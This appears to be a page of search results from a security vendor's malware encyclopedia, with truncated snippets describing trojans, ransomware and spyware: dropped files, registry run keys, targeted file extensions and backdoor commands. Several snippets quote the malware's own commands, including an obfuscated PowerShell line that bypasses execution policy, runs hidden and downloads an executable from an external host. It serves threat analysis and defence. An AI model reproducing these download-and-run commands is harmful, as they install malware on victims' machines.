Keyword: h
5923 Total Search   |   Showing Results : 21 - 40
creates the following folders: {drive}\Photo where {drive} can be any of the following: D E F G H I J K L M NOTES: The following sites contain the configuration data where this Trojan downloads an arbitrary
Temp%\CMSTP.inf It adds the following processes: %Public%\peee.com http://www.j.mp/akd{BLOCKED} powershell.exe -w h -NoProfile -ExecutionPolicy Bypass -Command (New-Object IO.StreamReader(
psd pps ppt pptx xlr xls xlsx doc docx pdf rtf txt wks wps py jar c class cpp cs h swift mp3 wav avi mp4 mkv zip tar.gz tar It appends the following extension to the file name of the encrypted files:
capabilities: can steal files with the following file extensions: dll exe jar jpg jpeg png bmp gif ico html htm xml php cpp c h docx txt 7z rar zip others - specified by the user steal in the following
following files: %Windows%\h (Note: %Windows% is the Windows folder, which is usually C:\Windows or C:\WINNT.) Other Details This Trojan connects to the following possibly malicious URL: http://{BLOCKED
HKEY_CURRENT_USER\Software\{1MEC8KH9-170957-GTLJ8R-GTLJ8RO9WI}\ log\6/23/2019 It adds the following registry entries: HKEY_CURRENT_USER\Software\{1MEC8KH9-170957-GTLJ8R-GTLJ8RO9WI} H = "NzkuMTM0LjIyNS4xMTY6NDk0Nyw=
spyware drops the following files: %User Temp%\aut1.tmp %User Temp%\h %User Temp%\aut5.tmp %User Temp%\incl1 %User Temp%\aut9.tmp %User Temp%\incl2 (Note: %User Temp% is the user's temporary folder, where
file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. Installation This Trojan adds the following processes: cmd.exe /C "p^o^weRs^H^ell.e^xE^ -^EXeCUt
POwersheLl.^exe^ -eX^ec^uti^oN^P^olIc^Y ^ByPa^ss ^-n^oProfi^l^e -wiNdowstYle h^i^d^d^en ^(^New-O^B^je^ct sYs^tem.N^e^t.webcL^i^e^N^t^).downL^O^adfi^l^e(^'http://mail.archaicknights.com/2uzaqt.exe','%User
\LOG01\explorer %System Root%\LOG01\windows %System Root%\[‚«‚ñ‚à[‚Á™] [ŒÂlî•ñ] [1110071836] Administrator %System Root%\[‚«‚ñ‚à[‚Á™] [ŒÂlî•ñ] [1110071836] Administrator\ƒ[ƒh %System Root%\[‚«‚ñ
execution at every system startup: HKEY_CURRENT_USER\Software\Microsoft\ Windows\CurrentVersion\Run j AZNb h = "%User Profile%\Application Data\CWS12D007Wilbert.exe" Other System Modifications This Trojan
\3D2C9BEA4369C4E343C8F9A11D57D4E6\b %System%\3D2C9BEA4369C4E343C8F9A11D57D4E6\h (Note: %System% is the Windows system folder, which is usually C:\Windows\System on Windows 98 and ME, C:\WINNT\System32 on Windows NT and 2000, or C:
HKEY_CURRENT_USER\Software\VB and VBA Program Settings\ Microzoft\9ACCBD2F0B4F90F865BFCBDC6AD81C78BAECA887 Exacutible = "xÏåp~§H±?" HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\ Windows\CurrentVersion\policies\ Explorer\Run
\D9DC14E5BA2AB834C0233642EB51301C\b\ %System%\D9DC14E5BA2AB834C0233642EB51301C\h\ (Note: %System% is the Windows system folder, which is usually C:\Windows\System on Windows 98 and ME, C:\WINNT\System32 on Windows NT and 2000, or C:
\0FDE2059F84931776D441E1607638CEC\b\ %System%\0FDE2059F84931776D441E1607638CEC\h\ (Note: %System% is the Windows system folder, which is usually C:\Windows\System on Windows 98 and ME, C:\WINNT\System32 on Windows NT and 2000, or C:
\7EE48F195381C49B94A1E5FB24085282\b %System%\7EE48F195381C49B94A1E5FB24085282\h (Note: %System% is the Windows system folder, which is usually C:\Windows\System on Windows 98 and ME, C:\WINNT\System32 on Windows NT and 2000, or C:
prints requested data B - prints file list C - read buffer D - write buffer E - delete file F - write to client G - creates file with random data H - lists files in directory and subdirectories otherwise